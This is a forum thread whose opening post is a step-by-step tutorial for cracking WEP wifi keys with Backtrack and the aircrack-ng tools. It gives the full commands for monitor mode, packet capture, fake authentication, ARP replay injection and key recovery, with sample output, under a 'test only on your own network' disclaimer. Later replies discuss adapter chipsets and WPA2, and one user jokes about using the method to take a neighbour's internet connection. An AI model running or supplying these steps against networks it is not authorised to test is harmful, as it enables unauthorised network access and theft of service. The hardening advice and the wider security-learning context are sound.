[Wireless] WEP Cracking

More than just game modification.

Moderator: wizme

wizme
Destiny General
Destiny General
Posts: 297
Joined: Sat Sep 05, 2009 1:40 pm

[Wireless] WEP Cracking

Post by wizme »

This tutorial is for learning, not hacking =) TEST IT ONLY ON YOUR OWN NETWORK

Things you need:
-Backtrack 3 or 4
-A wireless network interface card that can inject packets. Most inbuilt wireless card in Singapore does not have the ability, you need buy a one that can.
Around $30 you will be able to get it in SIM LIM. With usb wirelesscard, you are able to do all this in vmware.
Use TP LINK TL-WN321G if you dunno which to buy. I have tested with it and its working well.
-A Router to attack it.

Steps:
-Boot up your pc with backtrack
-Plug in your usb wireless card
-Open 2 terminal console
-For now we will be using just one console, enter "iwconfig" command and check if your wireless card is detected. Just plug out and plug in to see any diference. You should have something like rausb0, different name with different cards.
-rausb0 is your wireless card name in backtrack, you will need to use it alot.

-now start your wireless card by using this command "airmon-ng start rausb0"
-now use this command "airodump-ng rausb0", this will scan for all availiable access point, you will see your router name and mac address. note that down.
-you can stop scanning by issuing the cancel command "crtl-c".
-first we need to collect packets from the router, use this command "airodump-ng -c 6 --bssid <your router MAC address> -w output rausb0"
you should see something like this:

Code: Select all

 
 [CH  6 ][ Elapsed: 1 mins ][ <date and time> ] 
                                                                                                              
 BSSID                        PWR RXQ    Beacons    #Data, #/s  CH  MB  ENC    CIPHER     AUTH ESSID
                                                                                                            
 <your MAC address>   42    100     5240        10        338   9  54    WEP    WEP        <your router name>                           

-the data is the thing that your need to collect, in order to boost the data, we will nid to do the next step
-now go to your another terminal, issue this command to do a fake authentication with the access point, "aireplay-ng -1 0 -e <your router name> -a <your router MAC> -h <your wireless card MAC> rausb0", you can find your wireless MAC address written on the usb card itself.If not use "ifconfig -a" and see the HWaddr.
you should get this:

Code: Select all

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
If not, either you are not close enough to your router or your WEP encryption type is not set as OPEN.

-After successfully authentication, use this command for ARP request , "aireplay-ng -3 -b <your router MAC> -h <your own wireless MAC addr> rausb0", this will help alot in collecting the data. you should see something like

Code: Select all

 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
-Go back to the other terminal and see the data increasing, collect about 20k data and you can crtl-c it to cancel.rmb to cancel your arp request also on the other terminal.
-Now to bruteforce the WEP key, use this command "aircrack-ng -b <your router MAC> output*.cap"

You should get the WEP key =)
All 2wire default wep password is crackable.

Lesson of the day: Use WPA with a strong password. WEP is totally crackable in less than 15min.
Feel free to ask queston if you stuck at any part or i have any error in the tutorial.
Unlike science, love is like magic, there's no reason to it - wizme =)
Learn more of security, click here =)
User avatar
RavenOfDeath
Headmaster of Darkness
Headmaster of Darkness
Posts: 725
Joined: Mon Feb 08, 2010 6:43 pm

Re: [Wireless] WEP Cracking

Post by RavenOfDeath »

omg i using wep...
Goals:
Top 10 poster in Xemectrum [V]
Top 5 poster in Xemectrum [X]
Top 3 poster in Xemectrum [X]
Top poster in Xemectrum [X]
wizme
Destiny General
Destiny General
Posts: 297
Joined: Sat Sep 05, 2009 1:40 pm

Re: [Wireless] WEP Cracking

Post by wizme »

RavenOfDeath wrote:omg i using wep...
me too, because all my nieghbour have wireless so i nothing to worry, the range/power to attack must be near/strong so no worries, unless theres a fag/hacker take a laptop stand outside my door just to make me as scapegoat =)
Unlike science, love is like magic, there's no reason to it - wizme =)
Learn more of security, click here =)
guyz92
The Emperor
The Emperor
Posts: 503
Joined: Sat Aug 29, 2009 8:52 am

Re: [Wireless] WEP Cracking

Post by guyz92 »

I would suggest Athrous base wifi card or realtek base.

I have TP-Link TL-WN321G and it does not work that well.

I can successful do it with my SMCWPCIT-G (athrous AR5006GS chipset)

TL-WN321G is base on ralink chipset.

==========================================
I am using WPA2 and hidden SSID.
SO it is very very hard to crack.
Image

ADSL:
Image

Fibre:
Image
Hydorgen
Death Warrior
Death Warrior
Posts: 72
Joined: Thu Dec 24, 2009 7:51 pm

Re: [Wireless] WEP Cracking

Post by Hydorgen »

guyz92 wrote:I would suggest Athrous base wifi card or realtek base.

I have TP-Link TL-WN321G and it does not work that well.

I can successful do it with my SMCWPCIT-G (athrous AR5006GS chipset)

TL-WN321G is base on ralink chipset.

==========================================
I am using WPA2 and hidden SSID.
SO it is very very hard to crack.
=,.=` what r u trying to say dude.....totaly blur.....

P.S. THX WIZME....HAHA...
guyz92
The Emperor
The Emperor
Posts: 503
Joined: Sat Aug 29, 2009 8:52 am

Re: [Wireless] WEP Cracking

Post by guyz92 »

Hydorgen wrote:
guyz92 wrote:I would suggest Athrous base wifi card or realtek base.

I have TP-Link TL-WN321G and it does not work that well.

I can successful do it with my SMCWPCIT-G (athrous AR5006GS chipset)

TL-WN321G is base on ralink chipset.

==========================================
I am using WPA2 and hidden SSID.
SO it is very very hard to crack.
=,.=` what r u trying to say dude.....totaly blur.....

P.S. THX WIZME....HAHA...
LOLZ

To protect your wifi been hack, use WPA2 with hidden SSID(Wifi Name).
Image

ADSL:
Image

Fibre:
Image
User avatar
RavenOfDeath
Headmaster of Darkness
Headmaster of Darkness
Posts: 725
Joined: Mon Feb 08, 2010 6:43 pm

Re: [Wireless] WEP Cracking

Post by RavenOfDeath »

u use that?
Goals:
Top 10 poster in Xemectrum [V]
Top 5 poster in Xemectrum [X]
Top 3 poster in Xemectrum [X]
Top poster in Xemectrum [X]
wizme
Destiny General
Destiny General
Posts: 297
Joined: Sat Sep 05, 2009 1:40 pm

Re: [Wireless] WEP Cracking

Post by wizme »

Hydorgen wrote:
guyz92 wrote:I would suggest Athrous base wifi card or realtek base.

I have TP-Link TL-WN321G and it does not work that well.

I can successful do it with my SMCWPCIT-G (athrous AR5006GS chipset)

TL-WN321G is base on ralink chipset.

==========================================
I am using WPA2 and hidden SSID.
SO it is very very hard to crack.
=,.=` what r u trying to say dude.....totaly blur.....

P.S. THX WIZME....HAHA...
you're welcome =)

hes trying to say get a better wireless card and have wpa2 for your wireless protection.
Hidden SSID means your router name will not be broadcast, meaning u wun see your router when you scan for accesspoint, you nid manually connect with your com.
Unlike science, love is like magic, there's no reason to it - wizme =)
Learn more of security, click here =)
Hydorgen
Death Warrior
Death Warrior
Posts: 72
Joined: Thu Dec 24, 2009 7:51 pm

Re: [Wireless] WEP Cracking

Post by Hydorgen »

guyz92 wrote:
Hydorgen wrote:
guyz92 wrote:I would suggest Athrous base wifi card or realtek base.

I have TP-Link TL-WN321G and it does not work that well.

I can successful do it with my SMCWPCIT-G (athrous AR5006GS chipset)

TL-WN321G is base on ralink chipset.

==========================================
I am using WPA2 and hidden SSID.
SO it is very very hard to crack.
=,.=` what r u trying to say dude.....totaly blur.....

P.S. THX WIZME....HAHA...
LOLZ

To protect your wifi been hack, use WPA2 with hidden SSID(Wifi Name).
I C....WELL NOW I CAN STOP USING STREAMYX N JUST SHARING A CONNECTION WITH MY NEIGHBOUR HAHAS....
Armageddon
Master of Darkness
Master of Darkness
Posts: 254
Joined: Fri Sep 11, 2009 7:13 pm
Location: Singapore~

Re: [Wireless] WEP Cracking

Post by Armageddon »

lol Hydrogen, it's illegal to share wit ur neighbour, you could get caught.
Post Reply